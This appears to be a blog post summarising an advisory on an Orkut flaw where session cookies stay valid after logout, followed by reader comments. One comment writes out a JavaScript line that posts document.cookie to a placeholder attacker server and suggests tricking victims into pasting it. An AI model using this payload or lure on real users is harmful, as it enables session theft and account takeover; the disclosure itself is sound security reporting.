A researcher Susam Pal published today an interesting advisory about some vulnerabilities affecting Orkut – the famous social networking website, owned by Google.
There are several cases like -Sometimes the application may lock out the user to the main page when an operation fails, asking the user to login again, but failing to logout the user while doing it. This could confuse the users into thinking that they logged out.
And Now a hacker can use this stage for hacking the users account.At this stage the “orkut_state” cookie can still be used to login successfully, even if the user logged out. This is probably due to a failure to mark the session as expired on the server side.
How to?-A Technical Description(Never use this info to hack any others account)
On successful Orkut login, the following cookies are set:-
1. Domain: .www.orkut.com Cookie: orkut_state
2. Domain: .google.com Cookie: SID
3. Domain: www.google.com Cookie: LSID
The second and the third cookies are responsible for another flaw which
is described in this advisory. In the login page of Orkut, the login
form appears from google.com in an inline frame and the form inputs are
submitted back to google.com. Hence these cookies are set for the domain
google.com and www.google.com.
If an attacker manages to steal the SID and LSID cookies of the user,
he can gain access to the compromised account even after the user has
been logged out as described in ‘Vulnerability’ section.
In case of unsuccessful authentication during a session, when the
user finds himself logged out, if he leaves the browser unattended,
a trespasser can login to his account simply by accessing a valid URL
for his account as mentioned in ‘Vulnerability’ section.
Vulnerability:-
When an Orkut user fails to authenticate himself during a session (say,
while deleting a community), the user is redirected to a login page
where the user has to enter his password to login again. At this stage,
ideally the session should be disabled and should be enabled only after
the user re-authenticates himself. However, the session associated with
SID and LSID cookies remain alive at the server side. Therefore, it is
not safe to abandon the session at this stage. An attacker can set these
cookies in his browser and access the compromised account by visiting
http://www.gmail.com/, https://www.google.com/accounts/ManageAccount,
etc.
Orkut has suffered from other vulnerabilities in the past, including XSS, script insertion, information disclosure, and a worm which propagated malware:
Comments on this entry are closed.
OMG! if an XSS is disclosed now we are in great trouble. if it’s only XSS at least we can assume we are safe after logging out. but an XSS along with this vulnerability will let the hacker use our account even after logging out. this will multiply the effect of XSS.
pray everyone that nobody finds an XSS now.
The google team has not yet solved this security issue till now.Many orkut accounts have been deleted by the hackers.Thank you for this great informative post.
how can we read a cookie set by google or any other websites.Plz disclose..
as benjamin sulva has explained if there is an XSS flaw in Orkut it becomes very easy to steal session cookies and hack sessions.
XSS flaw allows you to execute javascript on the victim’s browser. the javascript take the document.cookie and post it in your server using an URL like this:-
javascript:location.href=’http://yourserver/yourscript?in=’ + document.cookie
even otherwise in absence of XSS one can fool another user to execute the javascript code by putting that in the address bar and pressing enter
Digg It
http://digg.com/security/Orkut_Accounts_being_Hacked_A_Reality
Visit the above link and click on the ‘digg it’ link below the yellow icon. More diggs can put pressure on Google to resolve this issue.
Digg It It
Visit the above link and click on the ‘digg it’ link below the yellow icon. More diggs can put pressure on Google to resolve this issue.
Digg It
Visit the above link and click on the ‘digg it’ link below the yellow icon. More diggs can put pressure on Google to resolve this issue.
plz give me d password ….my email id is djvicky2007@gmail.com
plzzz give my passeord.some one hacked my password plzz help me.my id sweetshweta.sakre@gmail.com
plz mail me the last four digits at tecutefun_bitts@yahoo.co.in
thanks in advance
thnx
Oh my god. It is still happened.My account is also hacked by someone before 1 week. But i got with a software. But i thought google provides a wonderful security. But all things are Fake.
hey guys this is great to see that some one are trying to help……….realy good………